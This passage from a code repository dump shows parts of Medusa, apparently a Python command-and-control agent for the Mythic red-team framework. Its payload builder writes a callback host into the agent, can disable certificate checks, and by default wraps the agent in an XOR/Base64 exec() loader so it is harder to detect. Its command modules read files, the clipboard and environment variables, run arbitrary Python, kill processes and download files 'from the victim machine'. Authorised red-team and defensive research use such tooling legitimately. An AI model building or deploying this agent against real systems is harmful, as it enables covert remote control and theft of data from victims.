self.sendTaskOutputUpdate(task_id, "\n[*] {} deleted: {} {}".format(obj_type, \ del_file, "({})".format(known_files[del_file]) if known_files[del_file] else "")) known_files.pop(file) else: if os.path.basename(file) not in os.listdir(os.path.dirname(file)): obj_type = "Directory" if not known_files[file] else "File" if print_out: self.sendTaskOutputUpdate(task_id, "\n[*] {} deleted: {} {}".format(obj_type, file, \ "({})".format(known_files[file]) if known_files[file] else "")) known_files.pop(file) if path == ".": file_path = self.current_directory else: file_path = path if path[0] == os.sep \ else os.path.join(self.current_directory,path) if not os.path.isdir(file_path): return "[!] Path must be a valid directory" elif not os.access(file_path, os.R_OK): return "[!] Path not accessible" else: self.sendTaskOutputUpdate(task_id, "[*] Starting directory watch for {}".format(path)) diffFolder(file_path, False) while(True): if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]: return "Job stopped." if not os.path.exists(file_path): return "[!] Root directory has been deleted." diffFolder(file_path) time.sleep(seconds) ================================================ FILE: Payload_Type/medusa/medusa/mythic/__init__.py ================================================ import glob import os.path from pathlib import Path from importlib import import_module, invalidate_caches import sys # Get file paths of all modules. currentPath = Path(__file__) searchPath = currentPath.parent / "agent_functions" / "*.py" modules = glob.glob(f"{searchPath}") invalidate_caches() for x in modules: if not x.endswith("__init__.py") and x[-3:] == ".py": module = import_module(f"{__name__}.agent_functions." + Path(x).stem) for el in dir(module): if "__" not in el: globals()[el] = getattr(module, el) sys.path.append(os.path.abspath(currentPath.name)) ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/__init__.py ================================================ ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/builder.py ================================================ from mythic_container.PayloadBuilder import * from mythic_container.MythicCommandBase import * from mythic_container.MythicRPC import * import asyncio, pathlib, os, tempfile, base64, hashlib, json, re from itertools import cycle class Medusa(PayloadType): name = "medusa" file_extension = "py" author = "@ajpc500" supported_os = [ SupportedOS.Windows, SupportedOS.Linux, SupportedOS.MacOS ] wrapper = False wrapped_payloads = ["pickle_wrapper"] mythic_encrypts = True note = "This payload uses Python to create a simple agent" supports_dynamic_loading = True c2_profiles = ["http", "azure_blob"] build_parameters = [ BuildParameter( name="output", parameter_type=BuildParameterType.ChooseOne, description="Choose output format", choices=["py", "base64"], default_value="py" ), BuildParameter( name="python_version", parameter_type=BuildParameterType.ChooseOne, description="Choose Python version", choices=["Python 3.8", "Python 2.7"], default_value="Python 3.8" ), BuildParameter( name="use_non_default_cryptography_lib", parameter_type=BuildParameterType.ChooseOne, description="Use non-default 'cryptography' Python library for comms (if not, manual crypto will be used)", choices=["No", "Yes"], default_value="No" ), BuildParameter( name="obfuscate_script", parameter_type=BuildParameterType.ChooseOne, description="XOR and Base64-encode agent code", choices=["Yes", "No"], default_value="Yes" ), BuildParameter( name="https_check", parameter_type=BuildParameterType.ChooseOne, description="Verify HTTPS certificate (if HTTP, leave yes)", choices=["Yes", "No"], default_value="Yes" ) ] agent_path = pathlib.Path(".") / "medusa" / "mythic" agent_icon_path = agent_path / "medusa.svg" agent_code_path = pathlib.Path(".") / "medusa" / "agent_code" build_steps = [ BuildStep(step_name="Gathering Files", step_description="Creating script payload"), BuildStep(step_name="Obfuscating Script", step_description="Encoding and encrypting script content") ] translation_container = None def getPythonVersionFile(self, directory, file): pyv = self.get_parameter("python_version") filename = "" if os.path.exists(os.path.join(directory, "{}.py".format(file))): #while we've specified a python version, this function is agnostic so just return the .py filename = os.path.join(directory, "{}.py".format(file)) elif pyv == "Python 2.7": filename = os.path.join(directory, "{}.py2".format(file)) elif pyv == "Python 3.8": filename = os.path.join(directory, "{}.py3".format(file)) if not os.path.exists(filename) or not filename: return "" else: return filename def _read_file(self, path: str) -> str: with open(path, "r") as f: return f.read() def _apply_https_setting(self, base_code: str, profile_name: str) -> str: if self.get_parameter("https_check") != "No": return base_code.replace("#CERTSKIP", "") if profile_name == "azure_blob": return base_code.replace( "#CERTSKIP", """ gcontext = ssl.create_default_context() gcontext.check_hostname = False gcontext.verify_mode = ssl.CERT_NONE\n""" ) return base_code.replace("urlopen(req)", "urlopen(req, context=gcontext)").replace( "#CERTSKIP", """ gcontext = ssl.create_default_context() gcontext.check_hostname = False gcontext.verify_mode = ssl.CERT_NONE\n""" ) def _parse_transport_template(self, template_code: str) -> dict: parts = re.split(r"###\s*(IMPORTS|CLASS_FIELDS|FUNCTIONS|CONFIG)\s*###", template_code) sections = {"IMPORTS": "", "CLASS_FIELDS": "", "FUNCTIONS": "", "CONFIG": ""} for i in range(1, len(parts), 2): section_name = parts[i].strip() section_value = parts[i + 1] sections[section_name] = section_value.strip("\n") return sections def _validate_transport_template_format(self, profile_name: str, template_code: str): required = ["IMPORTS", "CLASS_FIELDS", "FUNCTIONS", "CONFIG"] markers = re.findall(r"###\s*(IMPORTS|CLASS_FIELDS|FUNCTIONS|CONFIG)\s*###", template_code) missing = [m for m in required if markers.count(m) == 0] duplicates = [m for m in required if markers.count(m) > 1] if missing or duplicates: details = [] if missing: details.append("missing markers: {}".format(", ".join(missing))) if duplicates: details.append("duplicate markers: {}".format(", ".join(duplicates))) raise ValueError( "Transport template transport_{} has invalid section markers ({})".format( profile_name, "; ".join(details) ) ) def _validate_transport_sections(self, profile_name: str, sections: dict): required_non_empty = ["FUNCTIONS", "CONFIG"] missing = [s for s in required_non_empty if not sections.get(s, "").strip()] if missing: raise ValueError( "Transport template transport_{} is missing required non-empty sections: {}".format( profile_name, ", ".join(missing) ) ) def _validate_core_markers_replaced(self, base_code: str, profile_name: str): unresolved = [ marker for marker in [ "TRANSPORT_IMPORTS", "TRANSPORT_CLASS_FIELDS", "TRANSPORT_FUNCTIONS", "TRANSPORT_CONFIG", ] if marker in base_code ] if unresolved: raise ValueError( "Core template marker replacement failed for transport_{}; unresolved markers: {}".format( profile_name, ", ".join(unresolved) ) ) def _get_base_code_for_profile(self, profile_name: str) -> str: base_path = self.getPythonVersionFile(os.path.join(self.agent_code_path, "base_agent"), "base_agent_core") transport_path = self.getPythonVersionFile(os.path.join(self.agent_code_path, "base_agent"), f"transport_{profile_name}") if not base_path: raise ValueError("Missing base_agent_core template for selected python version") if not transport_path: raise ValueError("Missing transport template for profile {} and selected python version".format(profile_name)) base_code = self._read_file(base_path) transport_template = self._read_file(transport_path) self._validate_transport_template_format(profile_name, transport_template) transport_sections = self._parse_transport_template(transport_template) self._validate_transport_sections(profile_name, transport_sections) base_code = base_code.replace("TRANSPORT_IMPORTS", transport_sections["IMPORTS"]) base_code = base_code.replace("TRANSPORT_CLASS_FIELDS", transport_sections["CLASS_FIELDS"]) base_code = base_code.replace("TRANSPORT_FUNCTIONS", transport_sections["FUNCTIONS"]) base_code = base_code.replace("TRANSPORT_CONFIG", transport_sections["CONFIG"]) self._validate_core_markers_replaced(base_code, profile_name) return base_code def _to_python_literal(self, value): if isinstance(value, str): return value return json.dumps(value).replace("false", "False").replace("true", "True").replace("null", "None") def _apply_c2_parameter_replacements(self, base_code: str, c2): params = c2.get_parameters_dict() replacements = { "callback_host": params.get("callback_host", ""), "callback_port": params.get("callback_port", ""), "post_uri": params.get("post_uri", ""), "get_uri": params.get("get_uri", ""), "query_path_name": params.get("query_path_name", ""), "proxy_host": params.get("proxy_host", ""), "proxy_user": params.get("proxy_user", ""), "proxy_pass": params.get("proxy_pass", ""), "proxy_port": params.get("proxy_port", ""), "callback_interval": params.get("callback_interval", ""), "callback_jitter": params.get("callback_jitter", ""), "killdate": params.get("killdate", ""), "AESPSK": params.get("AESPSK", {}), "encrypted_exchange_check": params.get("encrypted_exchange_check", ""), "HEADER_PLACEHOLDER": params.get("headers", {}), } for placeholder, value in replacements.items(): if placeholder in base_code: base_code = base_code.replace(placeholder, self._to_python_literal(value)) return base_code async def build(self) -> BuildResponse: # this function gets called to create an instance of your payload resp = BuildResponse(status=BuildStatus.Success) # create the payload build_msg = "" try: command_code = "" for cmd in self.commands.get_commands(): command_path = self.getPythonVersionFile(self.agent_code_path, cmd) if not command_path: build_msg += "{} command not available for {}.\n".format(cmd, self.get_parameter("python_version")) else: command_code += self._read_file(command_path) + "\n" selected_c2 = None for c2 in self.c2info: profile_name = c2.get_c2profile()["name"] if profile_name in ["http", "azure_blob"]: selected_c2 = c2 break if selected_c2 is None: build_msg += "No supported C2 profile selected for {}.\n".format(self.name) resp.set_status(BuildStatus.Error) resp.build_stderr = "Error building payload: " + build_msg return resp profile_name = selected_c2.get_c2profile()["name"] base_code = self._get_base_code_for_profile(profile_name) if profile_name == "azure_blob": params = selected_c2.get_parameters_dict() killdate = params.get("killdate", None) callback_interval = str(params.get("callback_interval", "30")) callback_jitter = str(params.get("callback_jitter", "10")) config_data = await SendMythicRPCOtherServiceRPC(MythicRPCOtherServiceRPCMessage( ServiceName="azure_blob", ServiceRPCFunction="generate_config", ServiceRPCFunctionArguments={ "killdate": killdate, "payload_uuid": self.uuid } )) if not config_data.Success: resp.status = BuildStatus.Error resp.build_stderr = f"Build failed: {config_data.Error}" return resp await SendMythicRPCPayloadUpdatebuildStep( MythicRPCPayloadUpdateBuildStepMessage( PayloadUUID=self.uuid, StepName="Provisioning Azure Container", StepStdout=f"Container provisioned with scoped SAS token\nEndpoint: {config_data.Result['blob_endpoint']}", StepSuccess=True ) ) await SendMythicRPCPayloadUpdatebuildStep( MythicRPCPayloadUpdateBuildStepMessage( PayloadUUID=self.uuid, StepName="Stamping Configuration", StepStdout="Embedding Azure configuration into agent", StepSuccess=True ) ) base_code = base_code.replace("BLOB_ENDPOINT_PLACEHOLDER", config_data.Result["blob_endpoint"]) base_code = base_code.replace("CONTAINER_NAME_PLACEHOLDER", config_data.Result["container_name"]) base_code = base_code.replace("CONTAINER_SAS_PLACEHOLDER", config_data.Result["sas_token"]) base_code = base_code.replace("CALLBACK_INTERVAL_PLACEHOLDER", callback_interval) base_code = base_code.replace("CALLBACK_JITTER_PLACEHOLDER", callback_jitter) base_code = base_code.replace("AGENT_UUID_PLACEHOLDER", self.uuid) base_code = self._apply_https_setting(base_code, profile_name) if self.get_parameter("use_non_default_cryptography_lib") == "Yes": crypto_code = self._read_file(self.getPythonVersionFile(os.path.join(self.agent_code_path, "base_agent"), "crypto_lib")) else: crypto_code = self._read_file(self.getPythonVersionFile(os.path.join(self.agent_code_path, "base_agent"), "manual_crypto")) base_code = base_code.replace("CRYPTO_HERE", crypto_code) base_code = base_code.replace("UUID_HERE", self.uuid) base_code = base_code.replace("#COMMANDS_HERE", command_code) base_code = self._apply_c2_parameter_replacements(base_code, selected_c2) if build_msg != "": resp.build_stderr = build_msg resp.set_status(BuildStatus.Error) await SendMythicRPCPayloadUpdatebuildStep(MythicRPCPayloadUpdateBuildStepMessage( PayloadUUID=self.uuid, StepName="Gathering Files", StepStdout="Found all files for payload", StepSuccess=True )) if self.get_parameter("obfuscate_script") == "Yes": key = hashlib.md5(os.urandom(128)).hexdigest().encode() encrypted_content = ''.join(chr(c^k) for c,k in zip(base_code.encode(), cycle(key))).encode() b64_enc_content = base64.b64encode(encrypted_content) xor_func = "chr(c^k)" if self.get_parameter("python_version") == "Python 3.8" else "chr(ord(c)^ord(k))" base_code = """import base64, itertools exec(''.join({} for c,k in zip(base64.b64decode({}), itertools.cycle({}))).encode()) """.format(xor_func, b64_enc_content, key) await SendMythicRPCPayloadUpdatebuildStep(MythicRPCPayloadUpdateBuildStepMessage( PayloadUUID=self.uuid, StepName="Obfuscating Script", StepStdout="Script successfully obfuscated.", StepSuccess=True )) else: await SendMythicRPCPayloadUpdatebuildStep(MythicRPCPayloadUpdateBuildStepMessage( PayloadUUID=self.uuid, StepName="Obfuscating Script", StepStdout="Obfuscation not requested, skipping.", StepSuccess=True )) if self.get_parameter("output") == "base64": resp.payload = base64.b64encode(base_code.encode()) resp.build_message = "Successfully Built" else: resp.payload = base_code.encode() resp.build_message = "Successfully built!" except Exception as e: resp.set_status(BuildStatus.Error) resp.build_stderr = "Error building payload: " + str(e) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/cat.py ================================================ from mythic_container.MythicCommandBase import * import json from mythic_container.MythicRPC import * import sys class CatArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="path", type=ParameterType.String, description="Read and output the content of a file", ) ] async def parse_arguments(self): if len(self.command_line) > 0: if self.command_line[0] == "{": self.load_args_from_json_string(self.command_line) else: self.add_arg("path", self.command_line) else: raise ValueError("Missing arguments") class CdCommand(CommandBase): cmd = "cat" needs_admin = False help_cmd = "cat /path/to/file" description = "Read and output the contents of a file" version = 1 author = "@ajpc500" attackmapping = [ "T1005" ] argument_class = CatArguments attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: task.display_params = task.args.get_arg("path") return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/cd.py ================================================ from mythic_container.MythicCommandBase import * from mythic_container.MythicRPC import * import json import sys class CdArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="path", type=ParameterType.String, default_value=".", description="Path of file or folder on the current system to cd to", ) ] async def parse_arguments(self): if len(self.command_line) > 0: if self.command_line[0] == "{": self.load_args_from_json_string(self.command_line) else: self.args["path"].value = self.command_line else: self.args["path"].value = "." class CdCommand(CommandBase): cmd = "cd" needs_admin = False help_cmd = "cd /path/to/file" description = "Change working directory" version = 1 author = "@ajpc500" attackmapping = [] argument_class = CdArguments attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: task.display_params = task.args.get_arg("path") return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/clipboard.py ================================================ from mythic_container.MythicCommandBase import * import json from mythic_container.MythicRPC import * class GetClipboardArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [] async def parse_arguments(self): pass class GetClipboardCommand(CommandBase): cmd = "clipboard" needs_admin = False help_cmd = "clipboard" description = "This reads and outputs the contents of the clipboard using ObjC APIs" version = 1 is_exit = False is_file_browse = False is_process_list = False is_download_file = False is_remove_file = False is_upload_file = False author = "@ajpc500" argument_class = GetClipboardArguments attackmapping = [ "T1115" ] attributes = CommandAttributes( filter_by_build_parameter={ "python_version": "Python 2.7" }, supported_python_versions=["Python 2.7"], supported_os=[SupportedOS.MacOS], ) async def create_tasking(self, task: MythicTask) -> MythicTask: return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/cp.py ================================================ from mythic_container.MythicCommandBase import * from mythic_container.MythicRPC import * import json class CpArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="destination", type=ParameterType.String, parameter_group_info=[ParameterGroupInfo( required=True, ui_position=2 )], description="Location for copied file or folder", ), CommandParameter( name="source", type=ParameterType.String, parameter_group_info=[ParameterGroupInfo( required=True, ui_position=1 )], description="Path to file or folder for copying", ) ] async def parse_arguments(self): if self.command_line[0] != "{": pieces = self.command_line.split(" ") if len(pieces) == 2: self.add_arg("source", pieces[0]) self.add_arg("destination", pieces[1]) else: raise Exception("Wrong number of parameters, should be 2") else: self.load_args_from_json_string(self.command_line) class CpCommand(CommandBase): cmd = "cp" needs_admin = False help_cmd = "cp source destination" description = "copy file or folder to destination" version = 1 author = "@ajpc500" attackmapping = [] argument_class = CpArguments attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: task.display_params = "Copying " + str(task.args.get_arg("source")) + " to " task.display_params += str(task.args.get_arg("destination")) return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/cwd.py ================================================ from mythic_container.MythicCommandBase import * import json from mythic_container.MythicRPC import * class GetCwdArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [] async def parse_arguments(self): pass class GetCwdCommand(CommandBase): cmd = "cwd" needs_admin = False help_cmd = "cwd" description = "This gets the current working directory" version = 1 is_exit = False is_file_browse = False is_process_list = False is_download_file = False is_remove_file = False is_upload_file = False author = "@ajpc500" argument_class = GetCwdArguments attackmapping = [] attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/download.py ================================================ from mythic_container.MythicCommandBase import * import json from mythic_container.MythicRPC import * class DownloadArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="file", type=ParameterType.String, description="File to download.", parameter_group_info=[ParameterGroupInfo( required=True )] ), ] async def parse_arguments(self): if len(self.command_line) == 0: raise Exception("Require a path to download.\n\tUsage: {}".format(DownloadCommand.help_cmd)) filename = "" if self.command_line[0] == '"' and self.command_line[-1] == '"': self.command_line = self.command_line[1:-1] filename = self.command_line elif self.command_line[0] == "'" and self.command_line[-1] == "'": self.command_line = self.command_line[1:-1] filename = self.command_line elif self.command_line[0] == "{": temp_json = json.loads(self.command_line) # if "host" in temp_json: # # this means we have tasking from the file browser rather than the popup UI # # the medusa agent doesn't currently have the ability to do _remote_ listings, so we ignore it # filename = temp_json["path"] + "/" + temp_json["file"] filename = temp_json["file"] # else: # raise Exception("Unsupported JSON") else: filename = self.command_line if filename != "": self.args[0].value = filename class DownloadCommand(CommandBase): cmd = "download" needs_admin = False help_cmd = "download {path to remote file}" description = "Download a file from the victim machine to the Mythic server in chunks (no need for quotes in the path)." version = 1 supported_ui_features = ["file_browser:download"] is_download_file = True author = "@ajpc500" parameters = [] attackmapping = ["T1020", "T1030", "T1041"] argument_class = DownloadArguments browser_script = BrowserScript(script_name="download", author="@its_a_feature_", for_new_ui=True) attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_go_tasking(self, taskData: PTTaskMessageAllData) -> PTTaskCreateTaskingMessageResponse: response = PTTaskCreateTaskingMessageResponse( TaskID=taskData.Task.ID, Success=True, ) download_file = taskData.args.get_arg("file") response.DisplayParams = f"{download_file}" return response async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/download_bulk.py ================================================ from mythic_container.MythicCommandBase import * import json from mythic_container.MythicRPC import * class DownloadBulkArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="path", type=ParameterType.Array, default_value=[], description="Paths of file(s) or director(ies) to download.", parameter_group_info=[ParameterGroupInfo( required=True )] ), CommandParameter( name="mode", type=ParameterType.ChooseOne, choices=["archive", "iterative"], default_value="archive", description=( "Download mode: 'archive' bundles all files into a single in-memory zip archive, " "'iterative' sends each file individually." ), parameter_group_info=[ParameterGroupInfo( required=False )] ), ] async def parse_arguments(self): if len(self.command_line) == 0: raise Exception( "Require a path to download.\n\tUsage: {}".format(DownloadBulkCommand.help_cmd) ) if self.command_line[0] == "{": temp_json = json.loads(self.command_line) if "path" in temp_json: path_val = temp_json["path"] if isinstance(path_val, str): temp_json["path"] = [path_val] self.load_args_from_dictionary(temp_json) else: raw = self.command_line if (raw[0] == '"' and raw[-1] == '"') or (raw[0] == "'" and raw[-1] == "'"): raw = raw[1:-1] self.add_arg("path", [raw]) class DownloadBulkCommand(CommandBase): cmd = "download_bulk" needs_admin = False help_cmd = 'download_bulk {"path": ["/remote/path", "/remote/path2"], "mode": "archive"}' description = ( "Bulk download file(s), director(ies), or a mix from the target machine. " "Use 'archive' mode to bundle everything into a single in-memory zip, " "or 'iterative' mode to transfer each file individually." ) version = 1 is_download_file = True author = "@maclarel" parameters = [] attackmapping = ["T1020", "T1030", "T1041"] argument_class = DownloadBulkArguments browser_script = BrowserScript(script_name="download_bulk", author="@maclarel", for_new_ui=True) attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux], ) async def create_go_tasking(self, taskData: PTTaskMessageAllData) -> PTTaskCreateTaskingMessageResponse: response = PTTaskCreateTaskingMessageResponse( TaskID=taskData.Task.ID, Success=True, ) paths = taskData.args.get_arg("path") mode = taskData.args.get_arg("mode") or "archive" display = ", ".join(paths) if isinstance(paths, list) else str(paths) response.DisplayParams = f"{display} (mode: {mode})" return response async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/env.py ================================================ from mythic_container.MythicCommandBase import * import json from mythic_container.MythicRPC import * class GetEnvArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [] async def parse_arguments(self): pass class GetEnvCommand(CommandBase): cmd = "env" needs_admin = False help_cmd = "env" description = "This gets all environment variables" version = 1 is_exit = False is_file_browse = False is_process_list = False is_download_file = False is_remove_file = False is_upload_file = False author = "@ajpc500" argument_class = GetEnvArguments attackmapping = [] attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/eval_code.py ================================================ from mythic_container.MythicCommandBase import * import json, re from mythic_container.MythicRPC import * import sys class EvalArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="command", type=ParameterType.String, description="Command to evaluate in Python interpreter", ) ] async def parse_arguments(self): if len(self.command_line) > 0: self.add_arg("command", self.command_line) async def parse_dictionary(self, dictionary_arguments): self.load_args_from_dictionary(dictionary_arguments) class EvalCommand(CommandBase): cmd = "eval_code" needs_admin = False help_cmd = "eval_code python-code" description = "Evaluate python code in interpreter" version = 1 author = "@ajpc500" attackmapping = [] argument_class = EvalArguments attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: task.display_params = task.args.get_arg("command") return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/exit.py ================================================ from mythic_container.MythicCommandBase import * import json from mythic_container.MythicRPC import * class ExitArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [] async def parse_arguments(self): pass class ExitCommand(CommandBase): cmd = "exit" needs_admin = False help_cmd = "exit" description = "This exits the current agent process" version = 1 supported_ui_features = ["callback_table:exit"] is_exit = True is_file_browse = False is_process_list = False is_download_file = False is_remove_file = False is_upload_file = False author = "" argument_class = ExitArguments attackmapping = [] attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/jobkill.py ================================================ from mythic_container.MythicCommandBase import * import json from mythic_container.MythicRPC import * import sys class JobKillArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="target_task_id", type=ParameterType.String, description="Stop a long-running job", ) ] async def parse_arguments(self): if len(self.command_line) > 0: if self.command_line[0] == "{": self.load_args_from_json_string(self.command_line) else: self.add_arg("target_task_id", self.command_line) else: raise ValueError("Missing arguments") class JobKillCommand(CommandBase): cmd = "jobkill" needs_admin = False help_cmd = "jobkill {task_id}" description = "Sends a stop signal to a long-running job" version = 1 author = "@ajpc500" attackmapping = [] argument_class = JobKillArguments attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: task.display_params = "Sending stop signal for task with id: " + task.args.get_arg("target_task_id") return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/jobs.py ================================================ from mythic_container.MythicCommandBase import * import json from mythic_container.MythicRPC import * class JobsArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [] async def parse_arguments(self): pass class JobsCommand(CommandBase): cmd = "jobs" needs_admin = False help_cmd = "jobs" description = "List running jobs" version = 1 is_exit = False is_file_browse = False is_process_list = False is_download_file = False is_remove_file = False is_upload_file = False author = "@ajpc500" argument_class = JobsArguments attackmapping = [] browser_script = BrowserScript(script_name="jobs", author="@ajpc500", for_new_ui=True) attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/kill.py ================================================ from mythic_container.MythicCommandBase import * import json, re from mythic_container.MythicRPC import * import sys class KillArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="process_id", type=ParameterType.Number, description="ID of Process to Terminate", ) ] async def parse_arguments(self): if len(self.command_line) > 0: self.add_arg("process_id", self.command_line) async def parse_dictionary(self, dictionary_arguments): self.load_args_from_dictionary(dictionary_arguments) class KillCommand(CommandBase): cmd = "kill" needs_admin = False help_cmd = "kill process_id" description = "Terminate process by ID" version = 1 author = "@ajpc500" attackmapping = [] supported_ui_features = [ "process_browser:kill" ] argument_class = KillArguments attributes = CommandAttributes( supported_python_versions=["Python 3.8"], supported_os=[ SupportedOS.Windows ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: task.display_params = f"Terminating process with PID: " + str(task.args.get_arg("process_id")) return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/list_apps.py ================================================ from mythic_container.MythicCommandBase import * from mythic_container.MythicRPC import * class ListAppsArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [] async def parse_arguments(self): pass class ListAppsCommand(CommandBase): cmd = "list_apps" needs_admin = False help_cmd = "list_apps" description = "This lists all running applications" version = 1 is_exit = False is_file_browse = False is_process_list = False is_download_file = False is_remove_file = False is_upload_file = False author = "@ajpc500" argument_class = ListAppsArguments attackmapping = [] browser_script = BrowserScript(script_name="list_apps", author="@ajpc500", for_new_ui=True) attributes = CommandAttributes( filter_by_build_parameter={ "python_version": "Python 2.7" }, supported_python_versions=["Python 2.7"], supported_os=[SupportedOS.MacOS], ) async def create_tasking(self, task: MythicTask) -> MythicTask: resp = await MythicRPC().execute("create_artifact", task_id=task.id, artifact="NSWorkspace.sharedWorkspace().runningApplications()", artifact_type="API Called", ) return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/list_dlls.py ================================================ from mythic_container.MythicCommandBase import * from mythic_container.MythicRPC import * import json class ListDllsArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, 